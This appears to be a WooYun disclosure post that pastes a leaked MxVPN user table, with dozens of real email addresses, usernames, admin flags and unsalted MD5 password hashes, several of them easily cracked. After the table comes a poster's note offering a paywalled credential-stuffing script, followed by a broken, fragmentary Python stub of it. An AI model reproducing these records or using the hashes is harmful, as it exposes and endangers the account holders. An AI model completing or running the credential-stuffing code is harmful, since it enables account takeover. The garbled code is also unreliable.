[*] 0, , 0, , 7484160038, , , , Self reg., 2011-10-21, 0.00, , 0, 0, 852208320@qq.com, 1, 1, 2014-05-28 00:00:00, , 1, , , , , admin, 670b14728ad9902aecba32e22fa4f6bd, , , 1, 0, , , , 0, 2683037, 0, hansen1949, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, 591661698@qq.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , c8837b23ff8aaa8a2dde915473ce0991, , , 1, 0, , , , 0, 0, 0, zy199333210, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, 475792013@qq.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , b55520d6b6b8e7ff8cde718a81cc2e31, , , 1, 0, , , , 0, 0, 0, zkx47, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, yihua@sina.cn, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 52e49441c8adc1846da506281492d505, , , 1, 0, , , , 0, 0, 0, heixiaoer, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, jiguofei@msn.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 0b2952b0d93576dd24b49dcb66a9c7d8, , , 1, 0, , , , 0, 0, 0, jiji262, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, xcbbc@qq.com, 1, 1, 2011-10-21 00:00:00, , 0, , , , , , 97d6f550378c98d8fc0a626134772932, , , 1, 0, , , , 0, 0, 0, xcbbc, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , , 2011-10-21, 0.00, , 0, 0, , 1, 1, 2011-10-21 11:47:40, , 1, , , , , , 96e79218965eb72c92a549dd5a330112, , , 0, 0, , , , 0, 0, 0, 401328930, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 2644108249, , , , Self reg., 2011-10-21, 0.00, , 0, 0, kid_w@126.com, 1, 1, 2016-05-22 14:02:22, , 0, , , , , , 583d5639923f1c97d13bf09b4ebef454, , , 1, 27, , , , 0, 0, 0, kiddream, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 429972716, , , , Self reg., 2011-10-21, 0.00, , 0, 0, lyooivan@gmail.com, 1, 1, 2011-10-21 00:00:00, , 0, , , , , , 00e3afdea78aece2882756f9b8f1287f, , , 1, 0, , , , 0, 0, 0, lyooivan, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, myfantasticdream@yeah.net, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 399af73d212838ea919ac6b21276014d, , , 1, 0, , , , 0, 0, 0, dongfangzhi, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 594495537, , , , Self reg., 2011-10-21, 0.00, , 0, 0, 691208022@qq.com, 1, 1, 2011-10-21 00:00:00, , 0, , , , , , 46649211b95012819ed1de3d2378c58b, , , 1, 0, , , , 0, 0, 0, zhuimeng, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , , 2011-10-21, 0.00, , 0, 0, , 0, 1, 2011-10-21 13:43:43, , 1, , , , , , 96e79218965eb72c92a549dd5a330112, , , 0, 0, , , , 0, 0, 0, ulinx, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 2429728176, , , , Self reg., 2011-10-21, 0.00, , 0, 0, louisa.yin@163.com, 0, 1, 2011-10-21 00:00:00, , 1, , , , , admin, c16a28e376d6f1a70d8b4e9e43400dbe, , , 1, 0, , , , 0, 0, 0, louisayin, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, xiaohuli45@qq.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , cb93ddc35012866002c5df08ce974ac1, , , 1, 0, , , , 0, 0, 0, xiaohuli45, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, lkl110226106@163.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 88c4cfae4225e5eae94d701a775034d7, , , 1, 0, , , , 0, 0, 0, lkl110226106, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 114200436, , , , Self reg., 2011-10-21, 0.00, , 0, 0, yeming.luan@gmail.com, 1, 1, 2011-10-21 00:00:00, , 0, , , , , , d8d3a01ba7e5d44394b6f0a8533f4647, , , 1, 0, , , , 0, 0, 0, luanym, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 113017995, , , , Self reg., 2011-10-21, 0.00, , 0, 0, silentoy@qq.com, 1, 1, 2011-10-21 00:00:00, , 0, , , , , , 95a841547240b62e5207d60c5c999858, , , 1, 0, , , , 0, 0, 0, silentoy, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, xiecongjie@126.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , d78cd4bbb6310e072a9efdb58795779e, , , 1, 0, , , , 0, 0, 0, otuomai, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 1264156594, 订单号2015122115423272 充值到mxvpn帐号充值错误了已转到用户帐号mklhd已开通 2015.12.24, , , , 2011-10-21, 0.00, , 0, 0, , 0, 1, 2015-12-21 00:00:00, , 1, , , , , admin, d41d8cd98f00b204e9800998ecf8427e, , , 0, 0, , , , 0, 2144671205, 0, MxVPN, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , admin, 2011-10-21, 0.00, , 0, 0, , 0, 1, 2011-10-21 00:00:00, , 1, , , , , admin, 97f974881b3726d9a77014b5f3b4d795, , , 0, 0, , , , 0, 0, 0, daxie, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 23879747377, , , , Self reg., 2011-10-21, 0.00, , 0, 0, huangyikun@gmail.com, 0, 1, 2014-12-15 08:22:48, , 0, , , , , , f7339b3af73747fd974a70d4a2d95963, , , 1, 0, , , , 0, 0, 0, huangyikun, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, 1203057330@qq.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 1b7995c014e7a6b6b4e1d2d1b28ab8e1, , , 1, 0, , , , 0, 0, 0, qq1203057330, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 22347715722, , , , Self reg., 2011-10-21, 0.00, , 0, 0, weizeyun@sohu.com, 1, 1, 2011-10-21 00:00:00, , 0, , , , , , e7b92b66010f2d0655ef3515df03bc40, , , 1, 0, , , , 0, 0, 0, andreacinder, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , , 2011-10-21, 0.00, , 0, 0, , 0, 1, 2011-10-21 18:11:05, , 1, , , , , , 96e79218965eb72c92a549dd5a330112, , , 0, 0, , , , 0, 0, 0, start, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 47835563242, , , , Self reg., 2011-10-21, 0.00, , 0, 0, 82397143@qq.com, 0, 0, 2011-10-21 00:00:00, , 0, , , , , , 1d74da54d5c071a0fb0a619ea51171b2, , , 1, 0, , , , 0, 0, 0, longlong52017, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 278411083, , , , Self reg., 2011-10-21, 0.00, , 0, 0, pdsjz@qq.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 7e1cc054c30ca7548bd33d141bce63ce, , , 1, 0, , , , 0, 0, 0, jz009, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, cjy19890309@hotmail.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , ad06172e29c4fb6161c8763f55e3b630, , , 1, 0, , , , 0, 0, 0, jy1989, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , , 2011-10-21, 0.00, , 0, 0, , 0, 1, 2011-10-21 18:31:07, , 1, , , , , , e10adc3949ba59abbe56e057f20f883e, , , 0, 0, , , , 0, 0, 0, akka-se, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 3650156283, , , , Self reg., 2011-10-21, 0.00, , 0, 0, chinago@vip.qq.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 134fb34287853d2cc315490b52580343, , , 1, 0, , , , 0, 0, 0, chinago, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104938234, , , , Self reg., 2011-10-21, 0.00, , 0, 0, 595779860@qq.com, 1, 1, 2011-10-21 00:00:00, , 0, , , , , , 80f98d7e5d955254d1a6fbd22f9a8585, , , 1, 0, , , , 0, 0, 0, 3211098x, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, tyu4676@qq.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 078bbb4bf0f7117fb131ec45f15b5b87, , , 1, 0, , , , 0, 0, 0, you9988, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 185603372548, 2014.12.17 淘宝包月, , , Self reg., 2011-10-21, 0.00, , 0, 0, wf5599@163.com, 1, 1, 2016-05-27 03:25:54, , 0, , , , , , f8f5f370134d46cb215c82f92fcee9a0, , , 1, 27, , , , 0, 0, 0, wf5599, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 3669745664, , , , Self reg., 2011-10-21, 0.00, , 0, 0, long2827333@163.com, 1, 1, 2011-10-21 00:00:00, , 0, , , , , , 8898d2033bd36c3e896c89b5a0bbea0b, , , 1, 0, , , , 0, 0, 0, long2827333, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, jyasnnsy@hotmail.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 40159c855643746bf5ef46c3a77ae811, , , 1, 0, , , , 0, 0, 0, yamaha, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 323756142, , , , Self reg., 2011-10-21, 0.00, , 0, 0, aihui1106@yahoo.com.cn, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 3718f3e396d910737426bf98b0553cc7, , , 1, 0, , , , 0, 0, 0, aihui1106, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 1122200827, , , , Self reg., 2011-10-21, 0.00, , 0, 0, 345865759@163.com, 1, 1, 2011-10-21 00:00:00, , 0, , , , , , 5cb676d91f22028419b213b8722f4b5b, , , 1, 0, , , , 0, 0, 0, 345865759, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 7879189178, , , , Self reg., 2011-10-21, 0.00, , 0, 0, im.9@qq.com, 1, 1, 2011-10-21 00:00:00, , 0, , , , , , 0cf55d2049e79831f1ff510e3c6c574d, , , 1, 0, , , , 0, 0, 0, qq4379304, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 6465661042, , , , Self reg., 2011-10-21, 0.00, , 0, 0, jjh_4867@163.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , e10adc3949ba59abbe56e057f20f883e, , , 1, 0, , , , 0, 0, 0, angli2009, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 886801857, , , , Self reg., 2011-10-21, 0.00, , 0, 0, ip976480226@sina.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 6daa4815852b988d6df648f3c4bd2070, , , 1, 0, , , , 0, 0, 0, xuanyu, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 163653888, , , , Self reg., 2011-10-21, 0.00, , 0, 0, 605714481@qq.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 0e4b517d43c3560b9dfa998521d2f4f5, , , 1, 0, , , , 0, 0, 0, liyang5416, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, 675835840@qq.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , cdf5017e7dead4f4dc57005c429d5ca8, , , 1, 0, , , , 0, 0, 0, xiejie123, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 982050770, , , , Self reg., 2011-10-21, 0.00, , 0, 0, lshf512@gmail.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 20b46f5362997f6dbd4e3337cc43c74f, , , 1, 0, , , , 0, 0, 0, lshf512, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, maggie.c1014@163.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 7252aeb23c2e8949aa5a59e96fe0548b, , , 1, 0, , , , 0, 0, 0, maggie1014, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 1687180891, , , , Self reg., 2011-10-21, 0.00, , 0, 0, cef272683@126.com, 1, 1, 2011-10-21 00:00:00, , 0, , , , , , 41c6c1fda8c1ee964c26e60601b221c9, , , 1, 0, , , , 0, 0, 0, alex, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 5194642325, , , , Self reg., 2011-10-21, 0.00, , 0, 0, qian2nd@gmail.com, 1, 1, 2011-10-21 00:00:00, , 0, , , , , , 716b3744df6abb9712562440e5c4346d, , , 1, 0, , , , 0, 0, 0, qian2nd, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, dmxy0716@126.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 085c20d6acaac770f3a6c0854e10069c, , , 1, 0, , , , 0, 0, 0, dmxy0716, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2016-02-25, 0.00, , 0, 0, hash11@qq.com, 1, 1, 2016-02-25 23:27:30, , 0, , , , , , 6008ca2bb6faad7417a78193567ba8b2, , , 1, 0, , , , 0, 0, 0, hash11, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, caizhenghai@gmail.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , b42e78039c32e59ccc45ca22a2f22be1, , , 1, 0, , , , 0, 0, 0, cai314494687, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 142082660, , , , Self reg., 2011-10-21, 0.00, , 0, 0, mmsix@163.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 4f9a4d4fdebad4f866a8a79baa9b4cb2, , , 1, 0, , , , 0, 0, 0, mmsix, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 901407847, , , , Self reg., 2011-10-21, 0.00, , 0, 0, xfjd3656@sina.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 5b525e4856e25a1cf016537c5b8d5ab3, , , 1, 0, , , , 0, 0, 0, bf79, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 1828099494, , , , Self reg., 2011-10-21, 0.00, , 0, 0, wuoaidianpang23@gmail.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 507067f42cc812af51305cfd4234c16a, , , 1, 0, , , , 0, 0, 0, lightman, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 52689846022, , , , Self reg., 2011-10-21, 0.00, , 0, 0, fiost@hotmail.com, 0, 0, 2011-10-21 00:00:00, , 1, , , , , admin, 423247b8036343bb18b27e7635a96c48, , , 1, 0, , , , 0, 0, 0, 988024, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, jesept@163.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 4890cc9f21bf02460fa31f40a8abf327, , , 1, 0, , , , 0, 0, 0, sieben, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 43824162699, , , , Self reg., 2011-10-21, 0.00, , 0, 0, suidea@rediffmail.com, 0, 0, 2011-10-21 00:00:00, , 1, , , , , admin, 241ae75950ad398abfd08b02dd45c398, , , 1, 0, , , , 0, 0, 0, suidea, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, longlystranger@gmail.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 46f94c8de14fb36680850768ff1b7f2a, , , 1, 0, , , , 0, 0, 0, lstranger, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 36857578260, , , , Self reg., 2011-10-21, 0.00, , 0, 0, jk00900@yahoo.com.cn, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , d0970714757783e6cf17b26fb8e2298f, , , 1, 0, , , , 0, 0, 0, woaimx, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 245991307, , , , Self reg., 2011-10-21, 0.00, , 0, 0, 99711004@qq.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 26b637ed41273425be243e8d42e5b461, , , 1, 0, , , , 0, 0, 0, naked_eminem, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 127709982484, , , , Self reg., 2011-10-21, 0.00, , 0, 0, fushong37@sina.com, 0, 0, 2011-10-21 00:00:00, , 1, , , , , admin, 35da77a12e377164c1624b128e91db55, , , 1, 0, , , , 0, 0, 0, junfu, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, jzdtg2011@yahoo.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 52c4a1e615d4bd5bfbdef2f9dd95f404, , , 1, 0, , , , 0, 0, 0, jzdtg2011, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104892260, , , , Self reg., 2011-10-21, 0.00, , 0, 0, liqingyi@live.cn, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 0749da1c454ec850dfb87bc701d8c007, , , 1, 0, , , , 0, 0, 0, dent, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 4284839903, , , , Self reg., 2011-10-21, 0.00, , 0, 0, weeew_2@yahoo.com.cn, 1, 1, 2011-10-21 00:00:00, , 0, , , , , , 733d7be2196ff70efaf6913fc8bdcabf, , , 1, 0, , , , 0, 0, 0, weeew, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 111777160, , , , Self reg., 2011-10-21, 0.00, , 0, 0, tttgov@163.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , e10adc3949ba59abbe56e057f20f883e, , , 1, 0, , , , 0, 0, 0, tttgov, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 1976248454, , , , Self reg., 2011-10-21, 0.00, , 0, 0, 304459523@qq.com, 1, 1, 2011-10-21 00:00:00, , 0, , , , , , 7eda1fa45a7c21d0d8e565f59f1ff9d7, , , 1, 0, , , , 0, 0, 0, tengtawei, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 5312905982, , , , Self reg., 2011-10-21, 0.00, , 0, 0, hibem@qq.com, 1, 1, 2011-10-21 00:00:00, , 0, , , , , , 1e975188e95e8c9ad3a6a2da9ee9075c, , , 1, 0, , , , 0, 0, 0, hibem, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , , 2011-10-21, 0.00, , 0, 0, , 0, 1, 2011-10-21 21:39:13, , 1, , , , , , 96e79218965eb72c92a549dd5a330112, , , 0, 0, , , , 0, 0, 0, viganneg-677, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 10824459484, , , , Self reg., 2011-10-21, 0.00, , 0, 0, christliuwei@gmail.com, 1, 1, 2011-10-21 00:00:00, , 0, , , , , , 7999db6eb3551b2b0c0bc1f214067e43, , , 1, 0, , , , 0, 0, 0, insurgent, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, magic1000@yeah.net, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 9198df2ec1bdd425b64349ff5d43e4f5, , , 1, 0, , , , 0, 0, 0, magic1000, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, 313537298@qq.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 1f122f239689523a37f662748c6fe523, , , 1, 0, , , , 0, 0, 0, yutao198987, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 162234419, , , , Self reg., 2011-10-21, 0.00, , 0, 0, robinhood5@qq.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 8a2e322ec9a5bde67d090d11c11688ba, , , 1, 0, , , , 0, 0, 0, ceshimx, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 3757675570, , , , Self reg., 2011-10-21, 0.00, , 0, 0, xtl2000@126.com, 1, 1, 2011-10-21 00:00:00, , 0, , , , , , 0f4137ed1502b5045d6083aa258b5c42, , , 1, 0, , , , 0, 0, 0, xtl2000, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 110447053, , , , Self reg., 2011-10-21, 0.00, , 0, 0, 1000069@163.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , d96e5bbed7fd17e6a43a58f02868ccd8, , , 1, 0, , , , 0, 0, 0, meng, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, gyckr@163.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , bec27f26b2209b430378549dfcdeb3d3, , , 1, 0, , , , 0, 0, 0, gyckr, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 319467653, , , , Self reg., 2011-10-21, 0.00, , 0, 0, dingdang117@hotmail.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 5a690d842935c51f26f473e025c1b97a, , , 1, 0, , , , 0, 0, 0, dingdang117, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 799790076, , , , Self reg., 2011-10-21, 0.00, , 0, 0, ziboy@yeah.net, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , f8519a4755be3d43f746d3c23f398ca8, , , 1, 0, , , , 0, 0, 0, ziboy, 0, 1, , 0, , 0, 0,


ps:审核大大,我能否发个撞库wiz脚本,想看的人必须支付2WB才能看,能的话帮我添加上,不能就把本行删掉吧 以下是代码

import md5
import json
import requests
import xmltodict
from wiz.client import Wiz
from bs4 import BeautifulSoup
def logined(username,password):
'Accept-Encoding':'gzip, deflate',
data='''<?xml version="1.0"?>
print r.content
return len(r.content)>1000
if __name__ == '__main__':
print logined('username','password')

版权声明:转载请注明来源 我在不想理你@乌云




忽略时间:2016-05-09 16:30


漏洞Rank:15 (WooYun评价)

